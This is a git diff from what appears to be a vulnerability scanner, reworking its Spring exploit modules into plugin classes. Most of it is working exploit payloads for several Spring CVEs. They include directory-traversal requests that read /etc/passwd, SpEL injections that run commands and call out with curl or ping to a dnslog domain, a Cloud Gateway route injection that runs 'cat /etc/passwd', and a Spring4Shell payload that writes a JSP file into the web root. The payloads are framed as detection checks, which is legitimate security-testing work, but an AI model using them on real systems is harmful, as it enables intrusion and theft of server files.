-    {'path': 'manage/log/view?filename=/etc/passwd&base=../../../../../../../'},
-    {'path': 'manage/log/view?filename=C:/Windows/System32/drivers/etc/hosts&base=../../../../../../../'},
-    {'path': 'manage/log/view?filename=C:\Windows\System32\drivers\etc\hosts&base=../../../../../../../'}
-]
-
-def cve_2021_21234_scan(clients):
-    ''' spring-boot-actuator-logview文件包含漏洞
-            <= 0.2.13
-            虽然检查了文件名参数以防止目录遍历攻击(filename=../somefile 防御了攻击)
-            但没有充分检查基本文件夹参数, 因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2021-21234',
-    }
-
-    for payload in cve_2021_21234_payloads: # * Payload
-        path = payload['path']              # * Path
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2022_22947.py b/payloads/Spring/cve_2022_22947.py
deleted file mode 100644
index 4a7237f..0000000
--- a/payloads/Spring/cve_2022_22947.py
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-randomName = random_md5()
-
-cve_2022_22947_payloads = [
-    {
-        'path-1': 'gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
-        'data-1': '''{"id": "RANDOMNAME","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"cat\\\",\\\"/etc/passwd\\\"}).getInputStream()))}"}}],"uri": "http://example.com"}'''.replace('RANDOMNAME', randomName),
-        'path-2': 'gateway/refresh',
-        'path-3': 'gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
-    },
-    {
-        'path-1': 'actuator/gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
-        'data-1': '''{"id": "RANDOMNAME","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"cat\\\",\\\"/etc/passwd\\\"}).getInputStream()))}"}}],"uri": "http://example.com"}'''.replace('RANDOMNAME', randomName),
-        'path-2': 'actuator/gateway/refresh',
-        'path-3': 'actuator/gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
-    },
-]
-
-def cve_2022_22947_scan(clients):
-    ''' 在 3.1.0 和 3.0.6 之前的版本中使用 Spring Cloud Gateway 的应用程序
-            在启用、暴露和不安全的 Gateway Actuator 端点时容易受到代码注入攻击
-            远程攻击者可以发出制作的恶意请求, 在远程主机上进行远程执行任意代码
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2022-22947',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2022_22947_payloads:
-        path_1 = payload['path-1']
-        data_2 = payload['data-1']
-        
-        path_2 = payload['path-2']
-        path_3 = payload['path-3']
-
-        # * 1/ 命令执行
-        res1 = client.request(
-            'post',
-            path_1,
-            data=data_2,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        # * 2/ 刷新路由
-        res2 = client.request(
-            'post',
-            path_2,
-            # headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        # * 3/ 查看回显
-        res3 = client.request(
-            'get',
-            path_3,
-            # headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res3 is None:
-            continue
-
-        if (check.check_res_fileread(res3.text)):
-            results = {
-                'Target': res3.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2,
-                'Request-3': res3,
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2022_22963.py b/payloads/Spring/cve_2022_22963.py
deleted file mode 100644
index e71319f..0000000
--- a/payloads/Spring/cve_2022_22963.py
+++ /dev/null
@@ -1,78 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-randomName = random_md5()
-
-cve_2022_22963_payloads = [
-    {
-        'path': 'functionRouter',
-        'data': randomName,
-        'headers': {
-            'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("curl DNSDOMAIN")',
-            'Content-Type': 'text/plain'
-        }
-    },
-    {
-        'path': 'functionRouter',
-        'data': randomName,
-        'headers': {
-            'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping -c 4 DNSDOMAIN")',
-            'Content-Type': 'text/plain'
-        }
-    },
-    {
-        'path': 'functionRouter',
-        'data': randomName,
-        'headers': {
-            'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping DNSDOMAIN")',
-            'Content-Type': 'text/plain'
-        }
-    }
-]
-
-def cve_2022_22963_scan(clients):
-    ''' Spring Cloud Function中RoutingFunction类的apply方法
-            将请求头中的spring.cloud.function.routing-expression参数作为Spel表达式进行处理; 
-            造成了Spel表达式注入漏洞, 当使用路由功能时, 攻击者可利用该漏洞远程执行任意代码
-    '''
-    client = clients.get('reqClient')
-    sessid = 'ff864206449349277d8c5b0df7897d4b'
-
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2022-22963',
-    }
-
-    for payload in cve_2022_22963_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data']
-        headers = payload['headers']
-        headers['spring.cloud.function.routing-expression'] = headers['spring.cloud.function.routing-expression'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                                # * dns查询可能较慢, 等一会
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Spring/cve_2022_22965.py b/payloads/Spring/cve_2022_22965.py
deleted file mode 100644
index e286f60..0000000
--- a/payloads/Spring/cve_2022_22965.py
+++ /dev/null
@@ -1,81 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from time import sleep
-
-randomFileName = random_md5()
-randomStr = random_md5()
-
-cve_2022_22965_payloads = [
-    {
-        'path-1': '?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20out.println(%22<h1>{RCEMD}</h1>%22)%3B%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={FILENAME}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='.format(RCEMD=randomStr, FILENAME=randomFileName),
-        'data-1': '',
-        'path-2': '{FILENAME}.jsp'.format(FILENAME=randomFileName)
-    },
-    {
-        'path-1': '',
-        'data-1': 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20out.println(%22<h1>{RCEMD}</h1>%22)%3B%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={FILENAME}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='.format(RCEMD=randomStr, FILENAME=randomFileName),
-        'path-2': '{FILENAME}.jsp'.format(FILENAME=randomFileName)
-    }
-]
-
-def cve_2022_22965_scan(clients):
-    ''' Spring Framework 远程代码执行漏洞(Spring core RCE) '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Spring',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2022-22965',
-    }
-
-    headers = {
-        'suffix': '%>//',
-        'c1': 'Runtime',
-        'c2': '<%',
-        'DNT': '1'
-    }
-
-    for payload in cve_2022_22965_payloads: # * Payload
-        path_1 = payload['path-1']          # * Path-1
-        data_1 = payload['data-1']          # * Data-1
-        path_2 = payload['path-2']          # * Path-2
-
-        if data_1:
-            method = 'POST',
-        else:
-            method = 'GET'
-        
-        res1 = client.request(
-            method,
-            path_1,
-            data=data_1,
-            headers=headers, 
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-        
-        for i in range(3):
-            sleep(2.5)                                # * 延时, 因为命令执行的回显可能有延迟, 要等一会判断结果才准确
-            
-            res2 = client.request(
-                'get',
-                path_2,
-                allow_redirects=False,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            if ((res2.status_code == 200) and (randomStr in res2.text)):
-                results = {
-                    'Target': res1.request.url,
-                    'Verify': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request-1': res1,
-                    'Request-2': res2,
-                }
-                return results
-    return None
diff --git a/payloads/Spring/main.py b/payloads/Spring/main.py
deleted file mode 100644
index a44d67c..0000000
--- a/payloads/Spring/main.py
+++ /dev/null
@@ -1,72 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Spring扫描类: 
-        1. Spring Framework RCE(Spring core RCE)
-            CVE-2022-22965
-            Payload: https://vulhub.org/#/environments/spring/CVE-2022-22965/
-
-        2. Spring Boot Actuator Log View 文件读取/文件包含/目录遍历
-            CVE-2021-21234
-                Payload: https://bbs.zkaq.cn/t/5736.html
-
-        3. Spring Cloud Config Server目录遍历
-            CVE-2020-5410
-                Payload: https://bbs.zkaq.cn/t/5736.html
-
-        4. Spring Cloud Function SpEL 远程代码执行
-            CVE-2022-22963
-                Payload: https://vulhub.org/#/environments/spring/CVE-2022-22963/
-        
-        5. Spring Cloud Gateway SpEl 远程代码执行
-            CVE-2022-22947
-                Payload: https://vulhub.org/#/environments/spring/CVE-2022-22947/
-
-        6. Spring Security OAuth2 远程命令执行
-            CVE-2016-4977
-                Payload: https://vulhub.org/#/environments/spring/CVE-2016-4977/
-
-        7. Spring Data Rest 远程命令执行
-            CVE-2017-8046
-                Payload: https://vulhub.org/#/environments/spring/CVE-2017-8046/
-
-        8. Spring Data Commons 远程命令执行
-            CVE-2018-1273
-                Payload: https://vulhub.org/#/environments/spring/CVE-2018-1273/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Spring.cve_2016_4977 import cve_2016_4977_scan
-from payloads.Spring.cve_2017_8046 import cve_2017_8046_scan
-from payloads.Spring.cve_2018_1273 import cve_2018_1273_scan
-from payloads.Spring.cve_2020_5410 import cve_2020_5410_scan
-from payloads.Spring.cve_2021_21234 import cve_2021_21234_scan
-from payloads.Spring.cve_2022_22947 import cve_2022_22947_scan
-from payloads.Spring.cve_2022_22963 import cve_2022_22963_scan
-from payloads.Spring.cve_2022_22965 import cve_2022_22965_scan
-
-class Spring():
-    def __init__(self):
-        self.app_name = 'Spring'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2016_4977_scan, clients=clients),
-            thread(target=cve_2017_8046_scan, clients=clients),
-            thread(target=cve_2018_1273_scan, clients=clients),
-            thread(target=cve_2020_5410_scan, clients=clients),
-            thread(target=cve_2021_21234_scan, clients=clients),
-            thread(target=cve_2022_22947_scan, clients=clients),
-            thread(target=cve_2022_22963_scan, clients=clients),
-            thread(target=cve_2022_22965_scan, clients=clients),
-        ]
-
-spring = Spring()
diff --git a/payloads/Spring/spring-boot-cve-2021-21234-fileread.py b/payloads/Spring/spring-boot-cve-2021-21234-fileread.py
new file mode 100644
index 0000000..f5676a0
--- /dev/null
+++ b/payloads/Spring/spring-boot-cve-2021-21234-fileread.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Boot Actuator Log View 文件读取/文件包含/目录遍历
+    CVE-2021-21234
+        Payload: https://bbs.zkaq.cn/t/5736.html
+
+spring-boot-actuator-logview文件包含漏洞
+    <= 0.2.13
+    虽然检查了文件名参数以防止目录遍历攻击(filename=../somefile 防御了攻击)
+    但没有充分检查基本文件夹参数, 因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'manage/log/view?filename=/etc/passwd&base=../../../../../../../'},
+            {'path': 'manage/log/view?filename=C:/Windows/System32/drivers/etc/hosts&base=../../../../../../../'},
+            {'path': 'manage/log/view?filename=C:\Windows\System32\drivers\etc\hosts&base=../../../../../../../'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2021-21234',
+        }
+
+        for payload in self.payloads:           # * Payload
+            path = payload['path']              # * Path
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-cloud-config-cve-2020-5410-fileread.py b/payloads/Spring/spring-cloud-config-cve-2020-5410-fileread.py
new file mode 100644
index 0000000..7396fac
--- /dev/null
+++ b/payloads/Spring/spring-cloud-config-cve-2020-5410-fileread.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Cloud Config Server目录遍历
+    CVE-2020-5410
+        Payload: https://bbs.zkaq.cn/t/5736.html
+
+spring cloud config server目录遍历漏洞
+    可以使用特制URL发送请求, 从而跨目录读取文件。
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"'},
+            {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252FC:/Windows/System32/drivers/etc/hosts%23foo/development"'},
+            {'path': '..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252FC:\Windows\System32\drivers\etc\hosts%23foo/development"'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2020-5410',
+        }
+
+        for payload in self.payloads:  # * Payload
+            path = payload['path']              # * Path
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-cloud-function-cve-2022-22963-rce.py b/payloads/Spring/spring-cloud-function-cve-2022-22963-rce.py
new file mode 100644
index 0000000..86e5ea0
--- /dev/null
+++ b/payloads/Spring/spring-cloud-function-cve-2022-22963-rce.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Cloud Function SpEL 远程代码执行
+    CVE-2022-22963
+        Payload: https://vulhub.org/#/environments/spring/CVE-2022-22963/
+
+Spring Cloud Function中RoutingFunction类的apply方法
+    将请求头中的spring.cloud.function.routing-expression参数作为Spel表达式进行处理; 
+    造成了Spel表达式注入漏洞, 当使用路由功能时, 攻击者可利用该漏洞远程执行任意代码
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        randomName = random_md5()
+
+        self.payloads = [
+            {
+                'path': 'functionRouter',
+                'data': randomName,
+                'headers': {
+                    'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("curl DNSDOMAIN")',
+                    'Content-Type': 'text/plain'
+                }
+            },
+            {
+                'path': 'functionRouter',
+                'data': randomName,
+                'headers': {
+                    'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping -c 4 DNSDOMAIN")',
+                    'Content-Type': 'text/plain'
+                }
+            },
+            {
+                'path': 'functionRouter',
+                'data': randomName,
+                'headers': {
+                    'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping DNSDOMAIN")',
+                    'Content-Type': 'text/plain'
+                }
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'ff864206449349277d8c5b0df7897d4b'
+
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2022-22963',
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data']
+            headers = payload['headers']
+            headers['spring.cloud.function.routing-expression'] = headers['spring.cloud.function.routing-expression'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-cloud-gateway-cve-2022-22947-rce.py b/payloads/Spring/spring-cloud-gateway-cve-2022-22947-rce.py
new file mode 100644
index 0000000..f80d2e0
--- /dev/null
+++ b/payloads/Spring/spring-cloud-gateway-cve-2022-22947-rce.py
@@ -0,0 +1,106 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Cloud Gateway SpEl 远程代码执行
+    CVE-2022-22947
+        Payload: https://vulhub.org/#/environments/spring/CVE-2022-22947/
+
+在 3.1.0 和 3.0.6 之前的版本中使用 Spring Cloud Gateway 的应用程序
+    在启用、暴露和不安全的 Gateway Actuator 端点时容易受到代码注入攻击
+    远程攻击者可以发出制作的恶意请求, 在远程主机上进行远程执行任意代码
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        randomName = random_md5()
+
+        self.payloads = [
+            {
+                'path-1': 'gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
+                'data-1': '''{"id": "RANDOMNAME","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"cat\\\",\\\"/etc/passwd\\\"}).getInputStream()))}"}}],"uri": "http://example.com"}'''.replace('RANDOMNAME', randomName),
+                'path-2': 'gateway/refresh',
+                'path-3': 'gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
+            },
+            {
+                'path-1': 'actuator/gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
+                'data-1': '''{"id": "RANDOMNAME","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"cat\\\",\\\"/etc/passwd\\\"}).getInputStream()))}"}}],"uri": "http://example.com"}'''.replace('RANDOMNAME', randomName),
+                'path-2': 'actuator/gateway/refresh',
+                'path-3': 'actuator/gateway/routes/{RANDOMNAME}'.format(RANDOMNAME=randomName),
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2022-22947',
+        }
+        
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            path_1 = payload['path-1']
+            data_2 = payload['data-1']
+            
+            path_2 = payload['path-2']
+            path_3 = payload['path-3']
+
+            # * 1/ 命令执行
+            res1 = client.request(
+                'post',
+                path_1,
+                data=data_2,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            # * 2/ 刷新路由
+            res2 = client.request(
+                'post',
+                path_2,
+                # headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            # * 3/ 查看回显
+            res3 = client.request(
+                'get',
+                path_3,
+                # headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res3 is None:
+                continue
+
+            if (check.check_res_fileread(res3.text)):
+                results = {
+                    'Target': res3.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2,
+                    'Request-3': res3,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-cve-2022-22965-rce.py b/payloads/Spring/spring-cve-2022-22965-rce.py
new file mode 100644
index 0000000..a823ec0
--- /dev/null
+++ b/payloads/Spring/spring-cve-2022-22965-rce.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Framework RCE(Spring core RCE)
+    CVE-2022-22965
+    Payload: https://vulhub.org/#/environments/spring/CVE-2022-22965/
+
+Spring Framework 远程代码执行漏洞(Spring core RCE)
+'''
+
+from lib.tool.md5 import random_md5
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        randomFileName = random_md5()
+        self.randomStr = random_md5()
+
+        self.payloads = [
+            {
+                'path-1': '?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20out.println(%22<h1>{RCEMD}</h1>%22)%3B%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={FILENAME}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='.format(RCEMD=self.randomStr, FILENAME=randomFileName),
+                'data-1': '',
+                'path-2': '{FILENAME}.jsp'.format(FILENAME=randomFileName)
+            },
+            {
+                'path-1': '',
+                'data-1': 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20out.println(%22<h1>{RCEMD}</h1>%22)%3B%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={FILENAME}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='.format(RCEMD=self.randomStr, FILENAME=randomFileName),
+                'path-2': '{FILENAME}.jsp'.format(FILENAME=randomFileName)
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2022-22965',
+        }
+
+        headers = {
+            'suffix': '%>//',
+            'c1': 'Runtime',
+            'c2': '<%',
+            'DNT': '1'
+        }
+
+        for payload in self.payloads: # * Payload
+            path_1 = payload['path-1']          # * Path-1
+            data_1 = payload['data-1']          # * Data-1
+            path_2 = payload['path-2']          # * Path-2
+
+            if data_1:
+                method = 'POST',
+            else:
+                method = 'GET'
+            
+            res1 = client.request(
+                method,
+                path_1,
+                data=data_1,
+                headers=headers, 
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+            
+            for i in range(3):
+                sleep(2.5)                                # * 延时, 因为命令执行的回显可能有延迟, 要等一会判断结果才准确
+                
+                res2 = client.request(
+                    'get',
+                    path_2,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                if ((res2.status_code == 200) and (self.randomStr in res2.text)):
+                    results = {
+                        'Target': res1.request.url,
+                        'Verify': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request-1': res1,
+                        'Request-2': res2,
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-data-commons-cve-2018-1273-rce.py b/payloads/Spring/spring-data-commons-cve-2018-1273-rce.py
new file mode 100644
index 0000000..2f20ed2
--- /dev/null
+++ b/payloads/Spring/spring-data-commons-cve-2018-1273-rce.py
@@ -0,0 +1,81 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Data Commons 远程命令执行
+    CVE-2018-1273
+        Payload: https://vulhub.org/#/environments/spring/CVE-2018-1273/
+
+Spring Data是一个用于简化数据库访问, 并支持云服务的开源框架;
+    Spring Data Commons是Spring Data下所有子项目共享的基础框架;
+    Spring Data Commons 在2.0.5及以前版本中, 存在一处SpEL表达式注入漏洞, 
+        攻击者可以注入恶意SpEL表达式以执行任意命令
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'users?page=&size=5',
+                'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl DNSDOMAIN")]=&password=&repeatedPassword='
+            },
+            {
+                'path': 'users?page=&size=5',
+                'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 4 DNSDOMAIN")]=&password=&repeatedPassword='
+            },
+            {
+                'path': 'users?page=&size=5',
+                'data': 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping DNSDOMAIN")]=&password=&repeatedPassword='
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'f638f51cbd7085fc19b791bb689ad7d7'
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2018-1273',
+        }
+        
+        headers = {
+            'Referer': client.base_url
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-data-rest-cve-2017-8046-rce.py b/payloads/Spring/spring-data-rest-cve-2017-8046-rce.py
new file mode 100644
index 0000000..1424e12
--- /dev/null
+++ b/payloads/Spring/spring-data-rest-cve-2017-8046-rce.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Data Rest 远程命令执行
+    CVE-2017-8046
+        Payload: https://vulhub.org/#/environments/spring/CVE-2017-8046/
+
+构造ASCII码的JSON数据包, 向spring-data-rest服务器提交恶意PATCH请求, 可以执行任意代码
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {   # * curl
+                'path': '1',
+                'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{99,117,114,108,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
+            },
+            {   # * ping -c 4
+                'path': '1',
+                'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,45,99,32,52,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
+            },
+            {   # * ping
+                'path': '1',
+                'data': '[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,DNSDOMAIN}))/lastname", "value": "vulhub" }]'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
